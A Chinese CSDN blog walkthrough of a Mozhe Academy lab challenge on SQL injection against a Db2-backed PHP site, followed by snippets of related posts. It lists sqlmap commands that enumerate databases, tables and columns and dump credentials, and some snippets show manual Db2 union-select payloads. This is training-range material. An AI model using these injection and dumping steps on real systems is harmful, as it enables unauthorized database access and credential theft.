【墨者学院】SQL手工注入漏洞测试(Db2数据库)

最新推荐文章于 2024-07-23 14:05:29 发布
最新推荐文章于 2024-07-23 14:05:29 发布
阅读量248 收藏 4
点赞数 15
文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/muyuchen110/article/details/140616509
版权
背景介绍:

             安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+Db2,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标:

                         1.掌握SQL注入原理;
                         2.了解手工注入的方法;
                         3.了解Db2的数据结构;
                         4.了解字符串的MD5加解密;

解题方向:

          手工进行SQL注入测试,获取管理密码登录。

解题步骤:

1.  开启环境访问网站:124.70.71.251:46096

2.  寻找注入点:

3.  使用工具sqlmap判断是否存在注入:

python sqlmap.py -u  “漏洞url”

4.  判断服务器下所有数据库:

python sqlmap.py -u "l漏洞url" --dbs

5.  判断当前数据库名称:

python sqlmap.py -u "漏洞url" --current-db

6.  查看当前数据库下所有表:

python sqlmap.py -u "漏洞url" -D "数据库名" --tables

7.  判断 GAME_CHARACTER 表下名称:

python sqlmap.py -u "漏洞url" -D "数据库名" -T "表名" --column

8. 发现只有id参数,查询账号密码字段并dump下来:

python sqlmap.py -u "漏洞url" -D "数据库名" -T "表名" -C name --dump

查询到加密 密码,解密后登录成功发现key:

muyuchen110
关注
  • 15
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
墨者 - SQL手工注入漏洞测试(Db2数据库)
吃肉唐僧的博客
07-11 2744
进入环境,用order by测试,发现可以,并测试到字段为4 接下来用union select 1,2,3,4 发现失败 后来上网看了别人的思路是union select 1,2,3,4 from sysibm.systables就可以回显了 应该是不同的数据库语法问题 爆库 id=2 union select 1,2,current schema,4 from sysibm...
墨者学院 SQL手工注入漏洞测试(Db2数据库)
m0_63944205的博客
07-22 109
python3 sqlmap.py -u "网址" -D 库名 -T 表名 -C 字段名 --dump。3. SQL手工注入漏洞测试(Db2数据库)这时我们只能去猜他的字段指定查询。
墨者学院SQL手工注入漏洞测试(Db2数据库)
weixin_71053667的博客
07-22 84
1.为了方便使用sqlmap,点击进入。3.查找库DB2INST1,找表名。4.查找表内数据,没有查到敏感信息。2.sqlmap 找出库名。6.解码登录获得key。
墨者学院SQL手工注入漏洞测试(Db2数据库)题解
weixin_45790890的博客
07-22 167
安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+Db2,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
墨者-SQL手工注入漏洞测试(Db2数据库)
qq_66105152的博客
07-22 87
3.用union select判断回显位置发现显示不出来,
墨者学院 SQL手工注入漏洞测试(Db2数据库) 两种思路 超详细 小白也能看懂
qq_48368964的博客
07-22 586
墨者学院 SQL手工注入漏洞测试(Db2数据库) 两种思路 超详细 小白也能看懂
墨者学院——SQL手工注入漏洞测试(Db2数据库)
weixin_53198216的博客
07-22 153
3.进行order by查询列,查询得到4列。1.判断是否存在sql注入。4.查询得到回显位置。5.查询得到数据库名。6.根据库名得到表名。7.根据表名得到列名。10.登录得到key。
墨者学院-SQL手工注入漏洞测试(Db2数据库)
weixin_66503195的博客
07-22 98
进入界面点击进入查看库查看表名查看数据解码登录。
墨者学院-SQL手工注入漏洞测试(Db2数据库)解析
l_OMl_l的博客
07-22 261
由于是Db2数据库,所以当查询不到列时,直接指定列名,根据ID猜测name与password为大写,若未查到,可换username,userpassword等。通过题目得知本题为Db2数据库,故得知数据库DB2INST1。切记查询时带上ID一起查询,否则查出的数据是错误的,无法登陆。
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
OAuth2.0 or Spring Session or 单点登录流程
qq_53374893的博客
07-20 411
一句话精辟解释: 在过滤器放行的时候,偷偷的把原生的 request 和 response 对象换成了它的实现,也就是 调用getSession 的时候拿到的 其实是对redis 操作的Session。但其他的操作还是使用原生的,只不过重写的方法,调用的是子类的,也就是往 redis 里放入 Session,把原生的操作给替换了!分布式Session原理,使用子域名,的时候放入父域名的 JsessionId 然后将这个ID 的所存的内容放入Redis ,这样实现不同域名共享同一sessionID.
基于JSP的高校信息资源共享平台
heye0910032的博客
07-22 636
高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。通过使用JSP技术和MySQL数据库,本系统实现了一个稳定、安全、易用的高校信息资源管理平台。虽然在开发过程中遇到了一些技术挑战,但通过不断学习和实践,最终完成了一个能够满足用户需求的系统。未来,我们将继续优化系统功能,提升用户体验,以期达到更高的应用价值和社会效益。高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。
秒杀业务: 简单梳理
最新发布
m0_59925573的博客
07-23 1062
(1)在一人一单优惠券秒杀中,先是解决了因线程安全导致的超卖问题,为了满足一人一单的业务需求需要给查询订单表查询库存表上锁,但是synchronized只能满足单机环境下线程安全,在分布式环境对多个JVM需要使用分布式锁,于是手写分布式锁,但是在极端情况下,例如业务超时,会出现“误删”问题,手写锁无法解决,于是引入redisson,借助看门狗机制可以有效解决这个问题。
MySQL(事务、索引)&&MyBatis
hycccccch的博客
07-19 781
事务指的是一组操作的集合,是一个不可分割的工作单位。事务会将所有的操作作为一个整体一起向系统提交或撤销操作请求,即这些操作要么同时成功,要么同时失败默认MySQL的事务是自动提交,即当执行一条DML语句时,MySQL会立即隐式的提交事务开启事务后运行事务不会对数据改变,commit后才会改变数据如果有命令发生错误,需要进行rollback进行回滚、
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值